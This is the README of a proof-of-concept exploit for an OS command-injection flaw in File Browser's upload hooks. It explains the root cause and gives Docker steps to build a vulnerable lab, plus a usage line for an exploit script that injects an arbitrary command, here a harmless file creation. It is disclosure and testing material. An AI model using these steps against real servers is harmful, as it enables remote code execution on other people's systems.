## https://sploitus.com/exploit?id=A1A3EA14-8448-57BF-B35B-59AA7674CEDB
# CVE-2026-35585: File Browser OS Command Injection PoC
## Description
This repository contains a Proof of Concept (PoC) for **CVE-2026-35585**, a critical OS Command Injection vulnerability discovered in **File Browser** (versions 2.0.0 through 2.33.1).
The vulnerability exists in the "Custom Command Hooks" feature. Due to insufficient sanitization of environment variables (such as `$FILE` or `$USERNAME`) during shell execution, an authenticated user with file upload privileges can execute arbitrary commands on the host system by crafting a malicious filename.
**Discovered by:** saku0512 (https://github.com/Saku0512)
---
## โ ๏ธ Disclaimer
**This project is for educational and ethical security testing purposes only.**
The author is not responsible for any misuse, damage, or illegal activities caused by this tool. Unauthorized access to computer systems is illegal. By using this software, you agree to use it only in environments where you have explicit permission to conduct security testing.
---
## Vulnerability Details
- **CVE ID:** CVE-2026-35585
- **Type:** OS Command Injection (CWE-78)
- **Impact:** Remote Code Execution (RCE)
- **Affected Versions:** v2.0.0 <= File Browser <= v2.33.1
- **Fixed Version:** v2.33.8
### Root Cause
File Browser allows administrators to set up hooks (e.g., "After Upload"). When these hooks are triggered, the application executes a shell command and replaces variables like `$FILE` with the actual filename. If a filename contains shell metacharacters (e.g., `;`, `&`, `|`), they are executed by the system shell without proper escaping.
---
## Proof of Concept (Usage)
This section describes how to reproduce the Remote Code Execution (RCE) using the provided environment and exploit script.
### 1. Environment Setup
Deploy the vulnerable environment (File Browser v2.33.1) using Docker Compose:
```bash
# Ensure the data directory has the correct permissions
mkdir -p data && sudo chown -R 1000:1000 data
docker compose up -d
```
### 2. Configuration (Target Environment)
To trigger the vulnerability, a shell-based hook must be configured. Since SQLite might lock the database while the container is running, we recommend the following "offline" configuration method:
```bash
# 1. Stop the running container to release database lock
docker compose stop
# 2. Configure settings using a temporary container
# Set shell to "sh -c"
docker run --rm -v $(pwd)/data:/database filebrowser/filebrowser:v2.33.1 /bin/filebrowser config set --shell "sh -c" --database /database/filebrowser.db
# Add an After Upload command
docker run --rm -v $(pwd)/data:/database filebrowser/filebrowser:v2.33.1 /bin/filebrowser cmds add after_upload 'echo Uploaded: $FILE' --database /database/filebrowser.db
# Reset admin password to "admin"
docker run --rm -v $(pwd)/data:/database filebrowser/filebrowser:v2.33.1 /bin/filebrowser users update admin --password admin --database /database/filebrowser.db
# 3. Restart the container
docker compose start
```
### 3. Execution of Exploit
Run the `exploit.py` script to automate the login and malicious file upload. The following command attempts to create a file named `pwned_rce_test` in the `/tmp` directory of the container.
```bash
# Install dependencies
pip install requests
# Run the exploit
python3 exploit.py -t http://localhost:8080 -u admin -p admin -c "touch /tmp/pwned_rce_test"
```
### 4. Verification
Verify that the command was executed successfully by checking for the existence of the file inside the container:
```bash
docker exec -it cve-2026-35585-vuln-app ls -l /tmp/pwned_rce_test
```
If the file exists, the RCE is confirmed.
---
## Remediation
Update File Browser to **version 2.33.8** or later.
In the patched version, the hook functionality is disabled by default, and variable expansion is handled more securely.
---
## References
- [CVE-2026-35585 (cve.org)](https://vulners.com/cve/CVE-2026-35585)
- [Official GitHub Advisory](https://github.com/filebrowser/filebrowser/security/advisories/GHSA-jvpw-637p-h3pw)